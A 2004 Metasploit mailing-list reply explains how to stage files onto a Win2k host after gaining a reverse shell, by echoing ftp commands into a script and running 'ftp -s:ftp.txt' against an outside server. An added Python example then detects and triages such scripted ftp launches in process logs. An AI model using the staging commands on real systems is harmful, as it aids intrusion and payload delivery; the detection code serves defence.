Metasploit mailing list archives

Metasploit pen testing questions


From: sgorton at skaion.com (Sam Gorton)
Date: Wed, 10 Nov 2004 18:22:51 -0500

On Wed, Nov 10, 2004 at 10:38:46PM +0000, Regence 21 wrote:

> On Win2k I can get a reverse shell easily and execute commands, but if I
> try and start the Windows command line ftp client, it won't work (the command
> line just sits there after I enter ftp). Am I missing something? Without
> ftp, what is the easiest way to upload a file to a Win2k target host?

ftp is trying to interact with you, but it can't. What you can do is
to create a file on the target host that contains the username,
password, and all your FTP commands. You can load that file with
ftp -s:<filename>

Something like this:

cd \temp
echo ftp> ftp.txt
echo user@host>> ftp.txt
echo cd pub/...>> ftp.txt
echo prompt>> ftp.txt
echo hash>> ftp.txt
echo mget *>> ftp.txt
echo bye>> ftp.txt

ftp -s:ftp.txt <ftp_server>

Note that this creates the output file (in a directory we can write
to), then appends to it. Don't leave a space before the redirect; it
ends up in your ftp commands. Make sure you eliminate any
interaction.

(There may be an actual tutorial somewhere on how to do this, but I
learned this trick from someone else.) I've had good luck automating
this by wrapping metasploit with Perl's Expect.pm, but that's me.

--
Sam Gorton                |   Skaion Corporation
sgorton at skaion.com        |   (781) 396-1095
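
Added example, not part of the original post: a defender-side check that flags ftp.exe launches driven by a -s: script file in process-creation records, and triages a recovered script of the kind shown above. The record fields ("image", "cmdline"), the sample events, hosts and script text are constructed assumptions.

```python
import re

TOKEN = re.compile(r'(?:[^\s"]|"[^"]*")+')   # split on whitespace, honouring quotes
TRANSFER = {"get", "mget", "recv", "put", "mput", "send"}

# Constructed process-creation records and script text, not real logs.
SAMPLE_EVENTS = [
    {"image": r"C:\WINNT\system32\ftp.exe", "cmdline": r"ftp -s:ftp.txt 192.0.2.10"},
    {"image": r"C:\WINNT\system32\ftp.exe",
     "cmdline": r'ftp.exe -i -s:"C:\temp\get files.txt" files.example.test'},
    {"image": r"C:\WINNT\system32\ftp.exe", "cmdline": r"ftp files.example.test"},
    {"image": r"C:\WINNT\system32\cmd.exe", "cmdline": r"cmd /c dir -s:ftp.txt"},
]
SAMPLE_SCRIPT = "ftp\nuser@host\ncd pub/example\nprompt\nhash\nmget *\nbye\n"


def parse_ftp_cmdline(cmdline):
    """Return (script_path, server) from an ftp command line; either may be None."""
    script = server = None
    for tok in (t.replace('"', "") for t in TOKEN.findall(cmdline)[1:]):
        if tok[:3].lower() == "-s:":
            script = tok[3:]
        elif not tok.startswith("-") and server is None:
            server = tok
    return script, server


def find_scripted_ftp(events):
    """Flag ftp.exe launches that read their commands from a -s: script file."""
    hits = []
    for ev in events:
        if not ev["image"].lower().endswith("\\ftp.exe"):
            continue                      # -s: given to another program is not a hit
        script, server = parse_ftp_cmdline(ev["cmdline"])
        if script:
            hits.append({"script": script, "server": server})
    return hits


def summarize_script(text):
    """Triage a recovered script: login name and the transfer commands it ran."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    # Without ftp -n the first two lines answer the user and password prompts.
    user, commands = (lines[0] if lines else None), lines[2:]
    transfers = [c for c in commands if c.split()[0].lower() in TRANSFER]
    return {"user": user, "transfers": transfers}


if __name__ == "__main__":
    print(find_scripted_ftp(SAMPLE_EVENTS))
    print(summarize_script(SAMPLE_SCRIPT))
```

The echo lines that build the script are cmd.exe built-ins and do not appear as separate process launches, so the ftp.exe command line and the script file left on disk are the artifacts this check relies on.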


